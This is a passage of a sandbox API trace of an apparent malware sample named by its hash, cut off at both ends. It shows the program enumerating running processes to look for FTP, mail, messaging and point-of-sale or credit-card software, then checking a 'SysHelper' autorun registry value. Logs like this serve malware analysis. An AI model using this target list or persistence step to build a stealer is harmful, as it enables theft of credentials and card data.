hProcess=0x4e8, hModule=0x12f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0090.308] CloseHandle (hObject=0x4e8) returned 1 [0090.308] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb70) returned 0x4e8 [0090.308] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.309] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0090.309] CloseHandle (hObject=0x4e8) returned 1 [0090.309] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x4e8 [0090.309] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.311] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0090.311] CloseHandle (hObject=0x4e8) returned 1 [0090.311] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb80) returned 0x4e8 [0090.311] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.312] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x10a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0090.312] CloseHandle (hObject=0x4e8) returned 1 [0090.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb88) returned 0x4e8 [0090.312] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.314] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0090.314] CloseHandle (hObject=0x4e8) returned 1 [0090.314] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x4e8 [0090.314] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.315] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x830000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0090.315] CloseHandle (hObject=0x4e8) returned 1 [0090.315] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x4e8 [0090.315] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.317] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0090.317] CloseHandle (hObject=0x4e8) returned 1 [0090.317] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbcc) returned 0x4e8 [0090.317] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.318] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0090.318] CloseHandle (hObject=0x4e8) returned 1 [0090.318] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd4) returned 0x4e8 [0090.319] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.320] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xba0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0090.320] CloseHandle (hObject=0x4e8) returned 1 [0090.320] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbdc) returned 0x4e8 [0090.320] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.321] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0090.321] CloseHandle (hObject=0x4e8) returned 1 [0090.322] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x4e8 [0090.322] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.323] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0090.323] CloseHandle (hObject=0x4e8) returned 1 [0090.323] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbec) returned 0x4e8 [0090.323] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.324] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xdf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0090.325] CloseHandle (hObject=0x4e8) returned 1 [0090.325] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf4) returned 0x4e8 [0090.325] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.326] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x950000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0090.326] CloseHandle (hObject=0x4e8) returned 1 [0090.326] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x4e8 [0090.326] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.327] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x850000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0090.328] CloseHandle (hObject=0x4e8) returned 1 [0090.328] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x67c) returned 0x4e8 [0090.328] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.329] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1290000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0090.329] CloseHandle (hObject=0x4e8) returned 1 [0090.329] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd0) returned 0x4e8 [0090.329] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.330] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x320000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0090.331] CloseHandle (hObject=0x4e8) returned 1 [0090.331] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4dc) returned 0x4e8 [0090.331] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.332] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xee0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0090.332] CloseHandle (hObject=0x4e8) returned 1 [0090.332] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x554) returned 0x4e8 [0090.332] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.334] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0090.334] CloseHandle (hObject=0x4e8) returned 1 [0090.334] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x4e8 [0090.334] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.335] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xbd0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0090.335] CloseHandle (hObject=0x4e8) returned 1 [0090.335] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x4e8 [0090.335] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.337] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1170000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0090.337] CloseHandle (hObject=0x4e8) returned 1 [0090.337] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x4e8 [0090.337] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.339] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xf60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0090.339] CloseHandle (hObject=0x4e8) returned 1 [0090.339] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x908) returned 0x4e8 [0090.339] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.340] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xaf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0090.341] CloseHandle (hObject=0x4e8) returned 1 [0090.341] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x4e8 [0090.341] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.342] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x13b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0090.342] CloseHandle (hObject=0x4e8) returned 1 [0090.342] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x4e8 [0090.342] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.344] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x13b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0090.344] CloseHandle (hObject=0x4e8) returned 1 [0090.344] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x4e8 [0090.344] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.345] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x8d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0090.345] CloseHandle (hObject=0x4e8) returned 1 [0090.345] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x4e8 [0090.345] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.347] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x9c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0090.347] CloseHandle (hObject=0x4e8) returned 1 [0090.347] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x4e8 [0090.347] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.348] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe90000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0090.348] CloseHandle (hObject=0x4e8) returned 1 [0090.348] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x4e8 [0090.348] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.350] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xbb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0090.350] CloseHandle (hObject=0x4e8) returned 1 [0090.350] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x938) returned 0x4e8 [0090.350] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.351] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1060000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0090.351] CloseHandle (hObject=0x4e8) returned 1 [0090.351] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa70) returned 0x4e8 [0090.351] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.352] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x210000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0090.353] CloseHandle (hObject=0x4e8) returned 1 [0090.353] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa78) returned 0x4e8 [0090.353] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.354] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x3f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0090.355] CloseHandle (hObject=0x4e8) returned 1 [0090.355] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0c) returned 0x4e8 [0090.355] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.356] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0090.356] CloseHandle (hObject=0x4e8) returned 1 [0090.356] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc14) returned 0x4e8 [0090.356] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.357] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x960000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0090.358] CloseHandle (hObject=0x4e8) returned 1 [0090.358] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc20) returned 0x4e8 [0090.358] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.359] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0090.359] CloseHandle (hObject=0x4e8) returned 1 [0090.359] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc28) returned 0x4e8 [0090.359] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.360] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0090.361] CloseHandle (hObject=0x4e8) returned 1 [0090.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc30) returned 0x4e8 [0090.361] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.362] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x12f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0090.362] CloseHandle (hObject=0x4e8) returned 1 [0090.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc38) returned 0x4e8 [0090.362] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.363] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xef0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0090.364] CloseHandle (hObject=0x4e8) returned 1 [0090.364] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc40) returned 0x4e8 [0090.364] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.365] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0090.365] CloseHandle (hObject=0x4e8) returned 1 [0090.365] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc48) returned 0x4e8 [0090.365] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.366] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0090.367] CloseHandle (hObject=0x4e8) returned 1 [0090.367] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc50) returned 0x4e8 [0090.367] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.368] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x240000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0090.368] CloseHandle (hObject=0x4e8) returned 1 [0090.368] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc58) returned 0x4e8 [0090.368] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.369] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xdc0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0090.370] CloseHandle (hObject=0x4e8) returned 1 [0090.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc60) returned 0x4e8 [0090.371] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.373] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x960000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0090.373] CloseHandle (hObject=0x4e8) returned 1 [0090.373] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc88) returned 0x4e8 [0090.373] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.375] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="realizechoice.exe") returned 0x11 [0090.375] CloseHandle (hObject=0x4e8) returned 1 [0090.375] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc90) returned 0x4e8 [0090.375] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.377] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="victim.exe") returned 0xa [0090.377] CloseHandle (hObject=0x4e8) returned 1 [0090.377] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc98) returned 0x4e8 [0090.377] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.378] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xed0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="store-unit-evidence.exe") returned 0x17 [0090.379] CloseHandle (hObject=0x4e8) returned 1 [0090.379] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xca0) returned 0x4e8 [0090.379] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.380] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe30000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="second-blue-population.exe") returned 0x1a [0090.380] CloseHandle (hObject=0x4e8) returned 1 [0090.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xca8) returned 0x4e8 [0090.380] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.382] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1350000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="message price.exe") returned 0x11 [0090.382] CloseHandle (hObject=0x4e8) returned 1 [0090.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcbc) returned 0x0 [0090.382] CloseHandle (hObject=0x0) returned 0 [0090.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe84) returned 0x0 [0090.382] CloseHandle (hObject=0x0) returned 0 [0090.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf20) returned 0x4e8 [0090.382] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0090.384] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 0x44 [0090.384] CloseHandle (hObject=0x4e8) returned 1 [0090.392] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x28) returned 0x5f9e10 [0090.392] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2b11bc8 [0090.392] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2b08998 [0090.393] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x6077e0 [0090.393] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2afd6c0 [0090.393] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2b0f0c8 [0090.393] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2b025f8 [0090.393] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2b02860 [0090.393] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2b02ac8 [0090.393] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2b02d30 [0090.393] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x25c) returned 0x2b02f98 [0090.409] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4e8) returned 0x0 [0090.409] RegQueryValueExW (in: hKey=0x4e8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x0, lpData=0x18d168*=0x0, lpcbData=0x18ea20*=0x400) returned 0x2 [0090.409] RegCloseKey (hKey=0x4e8) returned 0x0 [0090.409] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75be0000 [0090.410] GetProcAddress (hModule=0x75be0000, lpProcName="SHGetFolderPathW") returned 0x75c65708 [0090.410] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" " [0090.410] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" ", pNumArgs=0x18ea04 | out: pNumArgs=0x18ea04) returned 0x6a2380*="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0090.410] lstrcpyW (in: lpString1=0x18c968, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0090.410] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0090.410] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18e168 | out: 